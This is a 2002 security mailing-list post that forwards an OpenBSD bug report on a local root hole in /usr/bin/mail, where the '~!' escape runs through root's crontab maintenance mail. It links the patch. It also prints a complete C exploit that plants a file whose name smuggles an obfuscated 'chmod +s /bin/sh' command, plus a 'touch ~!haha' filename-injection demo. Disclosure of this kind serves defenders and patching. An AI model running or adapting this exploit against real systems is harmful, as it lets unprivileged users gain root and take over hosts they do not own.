There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002).
Full problem report and exploit below. FreeBSD is not vulnerable.
----- Forwarded message from urbanek@openbsd.cz -----
From: urbanek@openbsd.cz
To: gnats@openbsd.org
Subject: user/2536: possible root compromise using /usr/bin/mail
>Number: 2536
>Category: user
>Synopsis: crontab entry allows possible arbitrary comand execution
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: bugs
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon Apr 8 13:30:02 MDT 2002
>Last-Modified:
>Originator: Milos Urbanek
>Organization:
>Release: all relases including CURRENT
>Environment:
System : OpenBSD 3.0
Architecture: OpenBSD.i386
Machine : i386
>Description:
program /usr/bin/mail allows a special escape sequence to
be specified in the body of an email; this escape sequence
specifies a shell comand to be executed
as mentioned in mail(1):
~!command
Execute the indicated shell command, then return to the message.
Problem:
default root crontab entry looks like:
# do daily/weekly/monthly maintenance
# on monday only (techie)
30 1 * * 1 /bin/sh /etc/daily 2>&1 | tee /var/log/d
aily.out | mail -s "`/bin/hostname` daily output" root
30 3 * * 6 /bin/sh /etc/weekly 2>&1 | tee /var/log/
weekly.out | mail -s "`/bin/hostname` weekly output" root
30 5 1 * * /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root
If there is something in files /etc/daily, /etc/weekly or /etc/monthly
which could enable the attacker to insert its own input,
like a malformed filename
chiba:5$ touch \~!haha
chiba:6$ ls -al *haha*
-rw-r--r-- 1 milos milos 0 Apr 8 19:30 ~!haha
or by other means like output from log files under /var/log,
the attacker can execute arbitrary comand running under root
privileges which can lead to the root compromise.
>How-To-Repeat:
read the man page, and see above
[...]
----- End forwarded message -----
Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
Exploit:
/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/
#include <fcntl.h>
int main(void)
{
int fd;
chdir("/tmp");
fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
if (fd)
close(fd);
}
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
